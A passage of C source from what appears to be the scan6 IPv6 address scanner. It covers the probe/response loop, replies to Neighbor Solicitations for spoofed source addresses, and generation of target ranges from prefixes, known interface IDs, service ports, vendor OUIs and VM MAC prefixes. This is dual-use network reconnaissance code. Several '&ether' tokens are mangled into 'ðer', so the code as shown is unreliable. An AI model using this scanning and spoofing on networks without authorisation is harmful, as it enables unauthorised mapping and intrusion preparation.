pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_tcp = (struct tcp_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ if( idata.type == DLT_EN10MB && !loopback_f && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(is_ip6_in_address_list(&(idata.ip6_global), &(pkt_ns->nd_ns_target)) || \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata.ip6_local))){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ if(idata.verbose_f) puts("Error sending Neighbor Advertisement message"); exit(EXIT_FAILURE); } } } else if( (probetype == PROBE_ICMP6_ECHO && pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) ||\ (probetype == PROBE_UNREC_OPT && pkt_icmp6->icmp6_type == ICMP6_PARAM_PROB)){ if(!is_ip6_in_scan_list(&scan_list, &(pkt_ipv6->ip6_src))) continue; if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; if(valid_icmp6_response_remote(&idata, &scan_list, probetype, pkthdr, pktdata, buffer)){ /* Print the Source Address of the incoming packet */ if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata.verbose_f>1) puts("inet_ntop(): Error converting IPv6 address to presentation format"); exit(EXIT_FAILURE); } if(timestamps_f){ if(gettimeofday(&pcurtime, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } if(localtime_r( (time_t *) &(pcurtime.tv_sec), &pcurtimetm) == NULL){ if(idata.verbose_f>1) puts("localtime_r(): Error obtaining local time."); exit(EXIT_FAILURE); } if(strftime(date, DATE_STR_LEN, "%a %b %d %T %Y", &pcurtimetm) == 0){ if(idata.verbose_f>1) puts("strftime(): Error converting current time to text"); exit(EXIT_FAILURE); } printf("%s (%s)\n", pv6addr, date); } else{ printf("%s\n", pv6addr); } } } } else if(probetype == PROBE_TCP && pkt_ipv6->ip6_nxt == IPPROTO_TCP){ if(!is_ip6_in_scan_list(&scan_list, &(pkt_ipv6->ip6_src))) continue; if(srcport_f) if(pkt_tcp->th_dport != htons(srcport)) continue; if(dstport_f) if(pkt_tcp->th_sport != htons(dstport)) continue; if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char *)pkt_tcp), IPPROTO_TCP) != 0) continue; if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata.verbose_f>1) puts("inet_ntop(): Error converting IPv6 address to presentation format"); exit(EXIT_FAILURE); } if(timestamps_f){ if(gettimeofday(&pcurtime, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } if(localtime_r((time_t *) &(pcurtime.tv_sec), &pcurtimetm) == NULL){ if(idata.verbose_f>1) puts("localtime_r(): Error obtaining local time."); exit(EXIT_FAILURE); } if(strftime(date, DATE_STR_LEN, "%a %b %d %T %Y", &pcurtimetm) == 0){ if(idata.verbose_f>1) puts("strftime(): Error converting current time to text"); exit(EXIT_FAILURE); } printf("%s (%s)\n", pv6addr, date); } else{ printf("%s\n", pv6addr); } } } } if(!donesending_f && !idata.pending_write_f && is_time_elapsed(&curtime, &lastprobe, pktinterval)){ idata.pending_write_f=TRUE; continue; } if(!donesending_f && FD_ISSET(idata.fd, &wset)){ idata.pending_write_f=FALSE; /* Check whether the current scan_entry is within range. Otherwise, get the next target */ if( !is_target_in_range(scan_list.target[scan_list.ctarget])){ if(!get_next_target(&scan_list)){ if(gettimeofday(&lastprobe, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } donesending_f=TRUE; continue; } } if(!send_probe_remote(&idata, &scan_list, &(idata.srcaddr), probetype)){ exit(EXIT_FAILURE); } if(gettimeofday(&lastprobe, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } if(!get_next_target(&scan_list)){ donesending_f=TRUE; continue; } } if(FD_ISSET(idata.fd, &eset)){ if(idata.verbose_f) puts("scan6: Found exception on libpcap descriptor"); exit(EXIT_FAILURE); } } } exit(EXIT_SUCCESS); } /* * Function: reset_scan_list() * * Resets each scan_list.target[]->cur to scan_list.target[]->start. */ void reset_scan_list(struct scan_list *scan){ unsigned int i; for(i=0; i < scan->ntarget; i++) (scan->target[i])->cur = (scan->target[i])->start; scan->ctarget=0; return; } /* * Function: is_target_in_range() * * Checks whether a scan_entry->cur is >= scan_entry->start && <= scan_entry->end */ int is_target_in_range(struct scan_entry *scan_entry){ unsigned int i; if(scan_list.ctarget >=scan_list.ntarget || scan_list.ctarget >= scan_list.maxtarget){ return(0); } for(i=0; i<=7; i++){ if( ntohs((scan_entry->cur).s6_addr16[i]) < ntohs((scan_entry->start).s6_addr16[i]) || \ ( ntohs((scan_entry->cur).s6_addr16[i]) > ntohs((scan_entry->end).s6_addr16[i])) ) return(0); } return(1); } /* * Function: get_next_target() * * "Increments" a scan_entry structure to obtain the next target to scan. */ int get_next_target(struct scan_list *scan_list){ int i; unsigned int cind; for(i=7; i>=0; i--){ /* Increment scan_entry according to scan_entry->start and scan_entry->end, starting with the low-order word */ if( ntohs((scan_list->target[scan_list->ctarget])->cur.s6_addr16[i]) >= \ ntohs((scan_list->target[scan_list->ctarget])->end.s6_addr16[i])){ if(i==0){ scan_list->ctarget++; if(scan_list->ctarget < scan_list->ntarget && scan_list->ctarget < scan_list->maxtarget){ return(1); } else{ return(0); } } (scan_list->target[scan_list->ctarget])->cur.s6_addr16[i]= (scan_list->target[scan_list->ctarget])->start.s6_addr16[i]; } else{ /* We must increment the current word */ cind= scan_list->ctarget; /* If we're incrementing the lowest-order word, and the scan range is larger than MIN_INC_RANGE, we increment the word by scan_list->inc. Otherwise, we increment the word by 1. */ if(i==7 && ( ntohs((scan_list->target[cind])->end.s6_addr16[7]) - ntohs( (scan_list->target[cind])->start.s6_addr16[7]) ) \ >= MIN_INC_RANGE ){ /* If the increment would exceed scan_entry->end, we make it "wrap around" */ if( ((unsigned int) ntohs((scan_list->target[cind])->cur.s6_addr16[7]) + scan_list->inc) > \ ntohs((scan_list->target[scan_list->ctarget])->end.s6_addr16[7]) ){ (scan_list->target[cind])->cur.s6_addr16[i]= htons((u_int16_t)((unsigned int) ntohs((scan_list->target[cind])->start.s6_addr16[i]) + \ ( (unsigned int) ntohs((scan_list->target[cind])->cur.s6_addr16[i]) + \ scan_list->inc - ntohs((scan_list->target[cind])->start.s6_addr16[i])) % \ ( ntohs((scan_list->target[cind])->end.s6_addr16[i]) - \ ntohs((scan_list->target[cind])->start.s6_addr16[i])))); } else{ /* Otherwise we simply increment the word with scan_list->inc */ scan_list->target[cind]->cur.s6_addr16[i] = htons(ntohs(scan_list->target[cind]->cur.s6_addr16[i]) + scan_list->inc); return(1); } } else{ /* If the scan range is smaller than MIN_IN_RANGE, or we are incrementing a word other than the lowest-order one, we try to increment in by 1. If this would exceed scan_entry->end, we set it to scan_entry->start and cause the next word to be incremented */ if( ((unsigned int) ntohs((scan_list->target[cind])->cur.s6_addr16[i]) + 1) > ntohs(scan_list->target[cind]->end.s6_addr16[i])){ (scan_list->target[cind])->cur.s6_addr16[i]= (scan_list->target[cind])->start.s6_addr16[i]; } else{ scan_list->target[cind]->cur.s6_addr16[i] = htons(ntohs(scan_list->target[cind]->cur.s6_addr16[i]) + 1); return(1); } } } } return(1); } /* * Function: print_scan_entries() * * Print address ranges to scan */ int print_scan_entries(struct scan_list *scan){ unsigned int i, j; for(i=0; i< scan->ntarget; i++){ for(j=0; j<8; j++){ if((scan->target[i])->start.s6_addr16[j] == (scan->target[i])->end.s6_addr16[j]) printf("%x", ntohs((scan->target[i])->start.s6_addr16[j])); else printf("%x-%x", ntohs((scan->target[i])->start.s6_addr16[j]), ntohs((scan->target[i])->end.s6_addr16[j])); if(j<7) printf(":"); else puts(""); } } return(1); } /* * Function: load_ipv4mapped32_prefixes() * * Generate scan_entry's for IPv4-mapped (32-bits) addresses */ int load_ipv4mapped32_entries(struct scan_list *scan, struct scan_entry *dst, struct prefix4_entry *v4host){ unsigned int i; u_int32_t mask32; if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; for(i=4; i<=5; i++) (scan->target[scan->ntarget])->start.s6_addr16[i]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[6]= htons( (u_int16_t) (ntohl(v4host->ip.s_addr) >> 16)); (scan->target[scan->ntarget])->start.s6_addr16[7]= htons( (u_int16_t) (ntohl(v4host->ip.s_addr) & 0x0000ffff)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6_addr16[i]= (scan->target[scan->ntarget])->start.s6_addr16[i]; mask32= 0xffffffff; for(i=0; i< v4host->len; i++) mask32=mask32<<1; for(i=0; i< v4host->len; i++) mask32=mask32>>1; (scan->target[scan->ntarget])->end.s6_addr16[6]= (scan->target[scan->ntarget])->end.s6_addr16[6] | htons( (u_int16_t)(mask32>>16)); (scan->target[scan->ntarget])->end.s6_addr16[7]= (scan->target[scan->ntarget])->end.s6_addr16[7] | htons((u_int16_t)(mask32 & 0x0000ffff)); scan->ntarget++; return(1); } /* * Function: load_ipv4mapped64_prefixes() * * Generate scan_entry's for IPv4-mapped (64-bits) addresses */ int load_ipv4mapped64_entries(struct scan_list *scan, struct scan_entry *dst, struct prefix4_entry *v4host){ unsigned int i; u_int32_t mask32; if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; (scan->target[scan->ntarget])->start.s6_addr16[4]= htons( (u_int16_t) (ntohl(v4host->ip.s_addr) >> 24)); (scan->target[scan->ntarget])->start.s6_addr16[5]= htons( ((u_int16_t) (ntohl(v4host->ip.s_addr) >> 16)) & 0x00ff); (scan->target[scan->ntarget])->start.s6_addr16[6]= htons( (u_int16_t) ((ntohl(v4host->ip.s_addr) >> 8) & 0x000000ff)); (scan->target[scan->ntarget])->start.s6_addr16[7]= htons( (u_int16_t) (ntohl(v4host->ip.s_addr) & 0x000000ff)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6_addr16[i]= (scan->target[scan->ntarget])->start.s6_addr16[i]; mask32= 0xffffffff; for(i=0; i< v4host->len; i++) mask32=mask32<<1; for(i=0; i< v4host->len; i++) mask32=mask32>>1; (scan->target[scan->ntarget])->end.s6_addr16[4]= (scan->target[scan->ntarget])->end.s6_addr16[4] | htons( (u_int16_t)(mask32>>24)); (scan->target[scan->ntarget])->end.s6_addr16[5]= (scan->target[scan->ntarget])->end.s6_addr16[5] | htons( (u_int16_t)(mask32>>16 & 0x000000ff)); (scan->target[scan->ntarget])->end.s6_addr16[6]= (scan->target[scan->ntarget])->end.s6_addr16[6] | htons( (u_int16_t)(mask32>>8 & 0x000000ff)); (scan->target[scan->ntarget])->end.s6_addr16[7]= (scan->target[scan->ntarget])->end.s6_addr16[7] | htons((u_int16_t)(mask32 & 0x000000ff)); for(i=4; i<=7; i++){ (scan->target[scan->ntarget])->start.s6_addr16[i]= htons( dec_to_hex(ntohs((scan->target[scan->ntarget])->start.s6_addr16[i]))); (scan->target[scan->ntarget])->end.s6_addr16[i]= htons( dec_to_hex(ntohs((scan->target[scan->ntarget])->end.s6_addr16[i]))); } scan->ntarget++; return(1); } /* * Function: load_knownprefix_entries() * * Generate prefix_entry's for known prefixes (populate the prefix_list) */ int load_knownprefix_entries(struct scan_list *scan_list, struct scan_list *prefix_list, FILE *fp){ unsigned int i; int r; char line[MAX_LINE_SIZE], *ptr, *charptr, *charstart, *charend, *lastcolon; char rangestart[MAX_RANGE_STR_LEN+1], rangeend[MAX_RANGE_STR_LEN+1]; struct prefix_entry prefix; while(fgets(line, sizeof(line), fp) != NULL){ r= read_prefix(line, Strnlen(line, MAX_LINE_SIZE), &ptr); if(r == 1){ if( (ranges= address_contains_ranges(ptr)) == 1){ charptr= ptr; charstart= rangestart; charend= rangeend; lastcolon= charend; while(*charptr && (ptr - charptr) <= MAX_RANGE_STR_LEN){ if(*charptr != '-'){ *charstart= *charptr; *charend= *charptr; charstart++; charend++; if(*charptr==':') lastcolon= charend; charptr++; } else{ charend= lastcolon; charptr++; while(*charptr && (ptr - charptr) <= MAX_RANGE_STR_LEN && *charptr !=':' && *charptr !='-'){ *charend= *charptr; charend++; charptr++; } } } *charstart=0; *charend=0; tgt_range_f=TRUE; if(scan_list->ntarget <= scan_list->maxtarget){ if( (scan_list->target[scan_list->ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f > 1) puts("scan6: Not enough memory"); return(0); } if ( inet_pton(AF_INET6, rangestart, &((scan_list->target[scan_list->ntarget])->start)) <= 0){ if(verbose_f>1) puts("inet_pton(): Error converting IPv6 address from presentation to network format"); return(0); } if ( inet_pton(AF_INET6, rangeend, &((scan_list->target[scan_list->ntarget])->end)) <= 0){ if(verbose_f>1) puts("inet_pton(): Error converting IPv6 address from presentation to network format"); return(0); } (scan_list->target[scan_list->ntarget])->cur= (scan_list->target[scan_list->ntarget])->start; /* Check whether the start address is smaller than the end address */ for(i=0;i<7; i++) if( ntohs((scan_list->target[scan_list->ntarget])->start.s6_addr16[i]) > ntohs((scan_list->target[scan_list->ntarget])->end.s6_addr16[i])){ if(verbose_f > 1) puts("Error in Destination Address range: Start address larger than end address!"); return(0); } if(IN6_IS_ADDR_MULTICAST(&((scan_list->target[scan_list->ntarget])->start))){ if(verbose_f > 1) puts("scan6: Remote scan cannot target a multicast address"); return(0); } if(IN6_IS_ADDR_MULTICAST(&((scan_list->target[scan_list->ntarget])->end))){ if(verbose_f > 1) puts("scan6: Remote scan cannot target a multicast address"); return(0); } scan_list->ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(verbose_f > 1) puts("Too many targets!"); return(0); } if(prefix_list->ntarget <= prefix_list->maxtarget){ if( (prefix_list->target[prefix_list->ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f > 1) puts("scan6: Not enough memory"); return(0); } /* Copy the recently added target to our prefix list */ *(prefix_list->target[prefix_list->ntarget])= *(scan_list->target[scan_list->ntarget - 1]); prefix_list->ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(verbose_f > 1) puts("Too many targets!"); return(0); } } else if(ranges == 0){ if((charptr = strtok_r(ptr, "/", &lasts)) == NULL){ if(verbose_f > 1) puts("Error in Destination Address"); return(0); } if ( inet_pton(AF_INET6, charptr, &(prefix.ip6)) <= 0){ if(verbose_f > 1) puts("inet_pton(): Destination Address not valid"); return(0); } if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ prefix.len = atoi(charptr); if(prefix.len>128){ if(verbose_f > 1) puts("Prefix length error in IPv6 Destination Address"); return(0); } sanitize_ipv6_prefix(&(prefix.ip6), prefix.len); } else{ prefix.len= 128; } if(prefix_list->ntarget <= prefix_list->maxtarget){ if( (prefix_list->target[prefix_list->ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scan6: Not enough memory"); return(0); } prefix_to_scan(&prefix, prefix_list->target[prefix_list->ntarget]); if(IN6_IS_ADDR_MULTICAST(&((prefix_list->target[prefix_list->ntarget])->start))){ if(verbose_f > 1) puts("scan6: Remote scan cannot target a multicast address"); return(0); } if(IN6_IS_ADDR_MULTICAST(&((prefix_list->target[prefix_list->ntarget])->end))){ if(verbose_f > 1) puts("scan6: Remote scan cannot target a multicast address"); return(0); } prefix_list->ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(verbose_f > 1) puts("Too many targets!"); return(0); } } dst_f=TRUE; } else if(r == -1){ if(verbose_f){ printf("Error in 'known prefixes' file %s\n", knownprefixesfile); } fclose(fp); return(0); } } return(1); } /* * Function: load_knowniid_entries() * * Generate scan_entry's for known Interface IDs */ int load_knowniid_entries(struct scan_list *scan, struct scan_list *prefix, struct prefix_list *iid){ unsigned int i, j, k; for(i=0; i< iid->nprefix; i++){ for(j=0; j < prefix->ntarget; j++){ if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= (prefix->target[j])->start; for(k=4; k<=7; k++) (scan->target[scan->ntarget])->start.s6_addr16[k]= (iid->prefix[i])->ip6.s6_addr16[k]; (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= (prefix->target[j])->end; for(k=4; k<=7; k++) (scan->target[scan->ntarget])->end.s6_addr16[k]= (iid->prefix[i])->ip6.s6_addr16[k]; scan->ntarget++; } } return(1); } /* * Function: load_knowniidfile_entries() * * Generate scan_entry's for known Interface IDs */ int load_knowniidfile_entries(struct scan_list *scan, struct scan_list *prefix, FILE *fp){ unsigned int i; int r; char line[MAX_LINE_SIZE]; struct in6_addr iid; while(fgets(line, sizeof(line), fp) != NULL){ r= read_ipv6_address(line, Strnlen(line, MAX_LINE_SIZE), &iid); if(r == 1){ for(i=0; i< prefix->ntarget; i++){ if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= (prefix->target[i])->start; for(j=4; j<=7; j++) (scan->target[scan->ntarget])->start.s6_addr16[j]= iid.s6_addr16[j]; (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= (prefix->target[i])->end; for(j=4; j<=7; j++) (scan->target[scan->ntarget])->end.s6_addr16[j]= iid.s6_addr16[j]; scan->ntarget++; } } else if(r == -1){ if(verbose_f){ printf("Error in 'known IIDs' file %s\n", knowniidsfile); } fclose(fp); return(0); } } return(1); } /* * Function: load_embeddedport_entries() * * Generate scan_entry's for IPv6 addresses with embedded service ports */ int load_embeddedport_entries(struct scan_list *scan, struct scan_entry *dst){ unsigned int i; for(i=0; i < (sizeof(service_ports_hex)/sizeof(u_int16_t)); i++){ if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; (scan->target[scan->ntarget])->start.s6_addr16[4]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[5]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[6]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[7]= htons(service_ports_hex[i]); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; (scan->target[scan->ntarget])->end.s6_addr16[4]= htons(0); (scan->target[scan->ntarget])->end.s6_addr16[5]= htons(0); (scan->target[scan->ntarget])->end.s6_addr16[6]= htons(EMBEDDED_PORT_2ND_WORD); (scan->target[scan->ntarget])->end.s6_addr16[7]= htons(service_ports_hex[i]); scan->ntarget++; if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; (scan->target[scan->ntarget])->start.s6_addr16[4]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[5]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[6]= htons(service_ports_hex[i]); (scan->target[scan->ntarget])->start.s6_addr16[7]= htons(0); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; (scan->target[scan->ntarget])->end.s6_addr16[4]= htons(0); (scan->target[scan->ntarget])->end.s6_addr16[5]= htons(0); (scan->target[scan->ntarget])->end.s6_addr16[6]= htons(service_ports_hex[i]); (scan->target[scan->ntarget])->end.s6_addr16[7]= htons(EMBEDDED_PORT_2ND_WORD); scan->ntarget++; } for(i=0; i < (sizeof(service_ports_dec)/sizeof(u_int16_t)); i++){ if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; (scan->target[scan->ntarget])->start.s6_addr16[4]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[5]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[6]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[7]= htons(service_ports_dec[i]); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; (scan->target[scan->ntarget])->end.s6_addr16[4]= htons(0); (scan->target[scan->ntarget])->end.s6_addr16[5]= htons(0); (scan->target[scan->ntarget])->end.s6_addr16[6]= htons(EMBEDDED_PORT_2ND_WORD); (scan->target[scan->ntarget])->end.s6_addr16[7]= htons(service_ports_dec[i]); scan->ntarget++; if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; (scan->target[scan->ntarget])->start.s6_addr16[4]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[5]= htons(0); (scan->target[scan->ntarget])->start.s6_addr16[6]= htons(service_ports_dec[i]); (scan->target[scan->ntarget])->start.s6_addr16[7]= htons(0); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; (scan->target[scan->ntarget])->end.s6_addr16[4]= htons(0); (scan->target[scan->ntarget])->end.s6_addr16[5]= htons(0); (scan->target[scan->ntarget])->end.s6_addr16[6]= htons(service_ports_dec[i]); (scan->target[scan->ntarget])->end.s6_addr16[7]= htons(EMBEDDED_PORT_2ND_WORD); scan->ntarget++; } return(1); } /* * Function: load_lowbyte_entries() * * Generate scan_entry's for low-byte addresses */ int load_lowbyte_entries(struct scan_list *scan, struct scan_entry *dst){ unsigned int i; if(scan->ntarget >= scan->maxtarget){ return(0); } if( (scan->target[scan->ntarget] = malloc(sizeof(struct scan_entry))) == NULL) return(0); (scan->target[scan->ntarget])->start= dst->start; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->start.s6_addr16[i]= htons(0); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=5; i++) (scan->target[scan->ntarget])->end.s6_addr16[i]= htons(0); (scan->target[scan->ntarget])->end.s6_addr16[6]= htons(LOW_BYTE_2ND_WORD_UPPER); (scan->target[scan->ntarget])->end.s6_addr16[7]= htons(LOW_BYTE_1ST_WORD_UPPER); scan->ntarget++; return(1); } /* * Function: load_oui_entries() * * Generate scan_entry's based on a specific IEEE OUI */ int load_oui_entries(struct scan_list *scan, struct scan_entry *dst, struct ether_addr *oui){ unsigned int i; if(scan->ntarget >= scan->maxtarget) return(0); if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } generate_slaac_address(&(dst->start), oui, &((scan->target[scan->ntarget])->start)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; for(i=0; i<4; i++) (scan->target[scan->ntarget])->end.s6_addr16[i]= dst->end.s6_addr16[i]; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6_addr16[i]= (scan->target[scan->ntarget])->start.s6_addr16[i]; /* The three low-order bytes must vary from 0x000000 to 0xffffff */ (scan->target[scan->ntarget])->end.s6_addr16[6]= (scan->target[scan->ntarget])->end.s6_addr16[6] | htons(0x00ff); (scan->target[scan->ntarget])->end.s6_addr16[7]= (scan->target[scan->ntarget])->end.s6_addr16[7] | htons(0xffff); scan->ntarget++; return(1); } /* * Function: load_vm_entries() * * Generate scan_entry's based on virtualization prefixes, and scan modes */ int load_vm_entries(struct scan_list *scan, struct scan_entry *dst, struct prefix4_entry *v4host){ unsigned int i; u_int32_t mask32; struct ether_addr ether; /* VirtualBOX */ if(vm_vbox_f){ if(scan->ntarget >= scan->maxtarget) return(0); if(ether_pton("08:00:27:00:00:00", ðer, sizeof(ether)) == 0){ if(verbose_f) puts("scan6: ether_pton(): Error converting Ethernet Address to presentation format"); return(0); } if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } generate_slaac_address(&(dst->start), ðer, &((scan->target[scan->ntarget])->start)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6_addr16[i]= (scan->target[scan->ntarget])->start.s6_addr16[i]; /* The three low-order bytes must vary from 0x000000 to 0xffffff */ (scan->target[scan->ntarget])->end.s6_addr16[6]= (scan->target[scan->ntarget])->end.s6_addr16[6] | htons(0x00ff); (scan->target[scan->ntarget])->end.s6_addr16[7]= (scan->target[scan->ntarget])->end.s6_addr16[7] | htons(0xffff); scan->ntarget++; } if(vm_vmware_f){ if(scan->ntarget >= scan->maxtarget) return(0); if(ether_pton("00:05:69:00:00:00", ðer, sizeof(ether)) == 0){ if(verbose_f) puts("scan6: ether_pton(): Error converting Ethernet Address to presentation format"); return(0); } if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } generate_slaac_address(&(dst->start), ðer, &((scan->target[scan->ntarget])->start)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6_addr16[i]= (scan->target[scan->ntarget])->start.s6_addr16[i]; /* If we know the host system IPv4 address, we can narrow down the search space. Otherwise the three low-order bytes must vary in the range 0x000000 to 0xffffff */ if(v4hostaddr_f){ if(v4hostprefix_f){ mask32= 0xffffffff; for(i=0; i< v4host->len; i++) mask32=mask32>>1; } else{ mask32= 0; } (scan->target[scan->ntarget])->start.s6_addr16[6]= (scan->target[scan->ntarget])->start.s6_addr16[6] | \ htons((ntohl(v4host->ip.s_addr) & 0x0000ff00)>>8); (scan->target[scan->ntarget])->start.s6_addr16[7]= (scan->target[scan->ntarget])->start.s6_addr16[7] | \ htons((ntohl(v4host->ip.s_addr) & 0x000000ff)<<8); (scan->target[scan->ntarget])->end.s6_addr16[6]= (scan->target[scan->ntarget])->end.s6_addr16[6] | \ htons((ntohl(v4host->ip.s_addr) & 0x0000ff00)>>8) | \ htonl((mask32 & 0x0000ff00)>>8); (scan->target[scan->ntarget])->end.s6_addr16[7]= (scan->target[scan->ntarget])->end.s6_addr16[7] | \ htons((ntohl(v4host->ip.s_addr) & 0x000000ff)<<8) | \ htonl((mask32 & 0x000000ff)<<8) | htons(0x00ff); } else{ (scan->target[scan->ntarget])->end.s6_addr16[6]= (scan->target[scan->ntarget])->end.s6_addr16[6] | htons(0x00ff); (scan->target[scan->ntarget])->end.s6_addr16[7]= (scan->target[scan->ntarget])->end.s6_addr16[7] | htons(0xffff); } scan->ntarget++; } if(vm_vmwarem_f){ if(scan->ntarget >= scan->maxtarget) return(0); if(ether_pton("00:50:56:00:00:00", ðer, sizeof(ether)) == 0){ if(verbose_f) puts("scan6: ether_pton(): Error converting Ethernet Address to presentation format"); return(0); } if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } generate_slaac_address(&(dst->start), ðer, &((scan->target[scan->ntarget])->start)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; (scan->target[scan->ntarget])->end= dst->end; for(i=4; i<=7; i++) (scan->target[scan->ntarget])->end.s6_addr16[i]= (scan->target[scan->ntarget])->start.s6_addr16[i]; /* The three low-order bytes must vary from 0x000000 to 0x3fffff */ (scan->target[scan->ntarget])->end.s6_addr16[6]= (scan->target[scan->ntarget])->end.s6_addr16[6] | htons(0x003f); (scan->target[scan->ntarget])->end.s6_addr16[7]= (scan->target[scan->ntarget])->end.s6_addr16[6] | htons(0xffff); scan->ntarget++; } return(1); } /* * Function: load_vendor_entries() * * Lookup vendor's IEEE OUIs */ int load_vendor_entries(struct scan_list *scan, struct scan_entry *dst, char *vendor){ FILE *fp; struct ether_addr aux_oui, oui_list[MAX_IEEE_OUIS]; char oui_ascii[ETHER_ADDR_PLEN]; char *oui_end=":00:00:00"; char *oui_hex_string="(hex)"; char line[MAX_IEEE_OUIS_LINE_SIZE]; char *charptr; unsigned int lines=0, ouis; int i; ouis=0; if( (fp=fopen(fname, "r")) == NULL){ 